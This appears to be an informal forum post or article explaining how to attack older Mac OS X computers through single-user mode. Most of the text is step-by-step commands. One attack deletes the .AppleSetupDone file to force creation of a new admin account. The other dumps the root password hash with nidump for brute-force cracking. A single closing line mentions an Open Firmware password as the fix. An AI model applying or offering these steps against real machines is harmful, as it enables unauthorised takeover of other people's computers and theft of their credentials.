Mac exploit and solution

  • Mac OSX is obviously not the programmers first choice, yet a great deal of people still use it as their operating system. The number of remote exploits with tools like metasploit is very limited because more people use windows. Although remote hacking can still be achieved from your Linux distro with a Java exploit, Apple's main vulnerability is the following.
    Mac computers have a big security flaw that requires physical access. When the Mac is booted an attacker can simply press cmd+s to boot into the "single user mode". A bash shell has now opened with basically unrestricted access provided you know the parameters. 
    I will now explain to ways to exploit this mode: 
    #1. (This way will escalate your privileges.)
    First you have to mount the HD by typing: 
    /sbin/mount -uw /
    Now it is possible to edit files. We now navigate to a certain directory by typing:
    cd /var/db/
    Now use the 'ls' command and check for a file called ".AppleSetupDone" Once you have located it simply type:
    rm .AppleSetupDone 
    The file has been deleted you can now restart the computer by typing 'reboot'. You will now be asked to setup the computer again, here you can create a new admin account which has full privileges. (YAY)
    #2. (Will dump the root hash)
    Again you have to mount the HD like so:
    /sbin/mount -uw /
    This time round you have to gain access to NetInfo for this we obviously need the computers network service on:
    Now we want to dump the root password hash right? To do this you simply type:
    nidump passwd
    This will show you the hash. Now use JTR or something similar to BF the hash and your done!
    PREVENTION: These exploits are luckily easily prevented by using open firmware to set a master password. Although you can bypass this on older OS' on most new versions this will cut of the attacker.
    Thanks for reading, I hope you enjoyed my little article on a somewhat unusual topic :)